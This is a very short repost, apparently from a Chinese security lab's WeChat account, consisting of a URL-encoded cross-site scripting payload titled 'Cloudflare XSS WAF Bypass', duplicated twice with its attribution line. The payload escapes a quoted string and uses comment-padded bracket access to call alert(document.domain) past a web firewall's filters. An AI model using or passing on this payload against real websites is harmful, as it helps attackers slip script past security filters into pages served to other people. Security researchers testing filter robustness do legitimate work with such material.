Payload:
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
原文始发于微信公众号(Khan安全攻防实验室):Cloudflare XSS WAF Bypass
Payload:
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
原文始发于微信公众号(Khan安全攻防实验室):Cloudflare XSS WAF Bypass